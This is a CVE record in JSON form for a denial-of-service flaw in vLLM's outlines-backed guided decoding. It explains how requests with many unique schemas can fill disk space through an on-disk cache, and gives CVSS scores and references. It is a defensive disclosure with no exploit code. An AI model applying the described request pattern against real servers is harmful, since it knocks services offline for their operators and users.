2025-03-23 03:03:54 +00:00

68 lines
4.1 KiB
JSON

{
"id": "CVE-2025-29770",
"sourceIdentifier": "security-advisories@github.com",
"published": "2025-03-19T16:15:31.977",
"lastModified": "2025-03-19T16:15:31.977",
"vulnStatus": "Awaiting Analysis",
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "vLLM is a high-throughput and memory-efficient inference and serving engine for LLMs. The outlines library is one of the backends used by vLLM to support structured output (a.k.a. guided decoding). Outlines provides an optional cache for its compiled grammars on the local filesystem. This cache has been on by default in vLLM. Outlines is also available by default through the OpenAI compatible API server. The affected code in vLLM is vllm/model_executor/guided_decoding/outlines_logits_processors.py, which unconditionally uses the cache from outlines. A malicious user can send a stream of very short decoding requests with unique schemas, resulting in an addition to the cache for each request. This can result in a Denial of Service if the filesystem runs out of space. Note that even if vLLM was configured to use a different backend by default, it is still possible to choose outlines on a per-request basis using the guided_decoding_backend key of the extra_body field of the request. This issue applies only to the V0 engine and is fixed in 0.8.0."
},
{
"lang": "es",
"value": "vLLM es un motor de inferencia y servicio de alto rendimiento y eficiente en memoria para LLM. La librer\u00eda de esquemas es uno de los backends que vLLM utiliza para la salida estructurada (tambi\u00e9n conocida como decodificaci\u00f3n guiada). Outlines proporciona una cach\u00e9 opcional para sus gram\u00e1ticas compiladas en el sistema de archivos local. Esta cach\u00e9 est\u00e1 activada por defecto en vLLM. Outlines tambi\u00e9n est\u00e1 disponible por defecto a trav\u00e9s del servidor de API compatible con OpenAI. El c\u00f3digo afectado en vLLM es vllm/model_executor/guided_decoding/outlines_logits_processors.py, que utiliza incondicionalmente la cach\u00e9 de outlines. Un usuario malintencionado puede enviar un flujo de solicitudes de decodificaci\u00f3n muy cortas con esquemas \u00fanicos, lo que resulta en una adici\u00f3n a la cach\u00e9 para cada solicitud. Esto puede provocar una denegaci\u00f3n de servicio si el sistema de archivos se queda sin espacio. Tenga en cuenta que, incluso si vLLM se configur\u00f3 para usar un backend diferente por defecto, a\u00fan es posible seleccionar esquemas por solicitud mediante la clave `guided_decoding_backend` del campo `extra_body` de la solicitud. Este problema solo afecta al motor V0 y se solucion\u00f3 en la versi\u00f3n 0.8.0."
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "security-advisories@github.com",
"type": "Secondary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "LOW",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"availabilityImpact": "HIGH"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6
}
]
},
"weaknesses": [
{
"source": "security-advisories@github.com",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-770"
}
]
}
],
"references": [
{
"url": "https://github.com/vllm-project/vllm/blob/53be4a863486d02bd96a59c674bbec23eec508f6/vllm/model_executor/guided_decoding/outlines_logits_processors.py",
"source": "security-advisories@github.com"
},
{
"url": "https://github.com/vllm-project/vllm/pull/14837",
"source": "security-advisories@github.com"
},
{
"url": "https://github.com/vllm-project/vllm/security/advisories/GHSA-mgrm-fgjv-mhv8",
"source": "security-advisories@github.com"
}
]
}